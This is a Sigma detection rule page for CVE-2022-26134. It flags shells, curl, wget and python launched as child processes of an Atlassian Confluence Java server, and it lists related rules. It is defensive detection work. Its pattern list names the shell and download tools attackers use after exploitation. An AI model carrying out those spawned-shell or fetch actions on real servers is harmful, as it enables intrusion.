Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Sigma rule (View on GitHub)
1title: Atlassian Confluence CVE-2022-26134
2id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
3related:
4 - id: 245f92e3-c4da-45f1-9070-bc552e06db11
5 type: derived
6status: test
7description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
8references:
9 - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
10author: Nasreddine Bencherchali (Nextron Systems)
11date: 2022-06-03
12tags:
13 - attack.initial-access
14 - attack.execution
15 - attack.t1190
16 - attack.t1059
17 - cve.2022-26134
18 - detection.emerging-threats
19logsource:
20 category: process_creation
21 product: linux
22detection:
23 selection:
24 # Monitor suspicious child processes spawned by Confluence
25 ParentImage|startswith: '/opt/atlassian/confluence/'
26 ParentImage|endswith: '/java'
27 CommandLine|contains:
28 - '/bin/sh'
29 - 'bash'
30 - 'dash'
31 - 'ksh'
32 - 'zsh'
33 - 'csh'
34 - 'fish'
35 - 'curl'
36 - 'wget'
37 - 'python'
38 condition: selection
39falsepositives:
40 - Unknown
41level: high
References
-
UPDATE: On June 3, 2022, Atlassian updated its security advisory with new information regarding a fix for Confluence Server and Data Center to address CVE-2022-26134. Users are encouraged to update immediately to […]
Read More
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
- OMIGOD HTTP No Authentication RCE - CVE-2021-38647
- Exploitation Activity of CVE-2025-59287 - WSUS Deserialization